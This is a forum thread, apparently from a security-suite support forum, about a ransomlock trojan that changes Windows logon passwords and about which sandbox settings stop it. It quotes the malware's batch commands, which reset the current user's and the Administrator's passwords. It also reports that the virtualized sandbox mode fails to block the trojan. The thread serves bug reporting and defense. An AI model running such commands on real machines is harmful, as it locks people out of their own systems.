About a ransomware

  1. I ran the malware.



  1. It was sandboxed as “partially limited”.

  2. I restarted the system.

  3. The password for “user logon” is modified, and the original one is invalid.
    → I can not logon the system by using the original password.

  4. code:

echo off
net user %username% 123456
[at]echo off
net user Administrator 123456

  1. environment:
    WinXP Pro SP3 32bit

I’m not even sure why the use Partially Limited as default if it’s known that it fails to stop pretty much any ransomware?

For usuability of legit apps.

What if it was default at limited?

then more legit apps wouldnt work in the sandbox

But when you’re making compromises between legit apps working and ransomware ireversably encrypting all your data, i’d always go with the protection over usability…

Completely agree. My BB is set to Untrusted. In my view the way to implement security is to close all the doors and only open those you know to be safe.

A safe that is not locked shut is not a safe…

i understand and agree to a certain extent, maybe comodo will find a way to give both usability and security.

I’m sure it will, Comodo always listen users :-TU

Can “Fully Virtualized” auto-sandbox level protect PC against this ransomware?

It should do. Yes.

Am I right that if something autosandboxed other than “fully virtualized” then it’s really just restricted (according to the set level from “Partially limited” to “Blocked”) but not sandboxed? So “reset sandbox” won’t clean the system from the activity of the autosandboxed app.


Thank you.

There is a new Ransomlock strain that is making its way to the rest of the world from China. It is basically just a script trojan that is backdoored to legitimate programs resulting in the Windows password being changed. One can read about it here:


Upon analysis of the sample I was able to reproduce the malware and run it against CIS. The default CIS settings will allow the malicious behavior, as well as the Full V auto-sandbox setting. Limited, Restricted, and Untrusted settings will protect the user.

Please note that this trojan strain is FUD, so will only be stopped by the most annoying HIPS settings or tightly restricted sandboxes.

Any Mods interested in verifying please PM.

Can you please explain exactly what happens when you run it as fully virtualized? Is it able to make the changes on the real computer, or only in the virtualized environment?


CIS set at default. Auto-0Sandbox changed to Full V:

1). sample run (application installer + backdoor)
2). CIS alert that file is Unknown, Default “Run Isolated” selected.
3). Application finished installing
4). Script then runs
5). Shutdown.exe is called up by script
6). On startup Windows passwords Changed.

I will not be able to test this on my computer, as I do not have a VM set up at the moment.

In order to get this looked at as quickly as possible, can you please create a properly formatted bug report for this in this section of the forum? The format can be found in this post. The fact that it’s able to change the password when sandboxed as FV definitely constitutes a bug.

Once you have done that I can forward this directly to the devs and hopefully have it fixed quickly. Can you also PM me a download link for the sample?

Thank you.

“net add newuser 123456789”



What do you mean? It’s a bit cryptic. :wink: Is it the password to which the trojan changes the Windows password?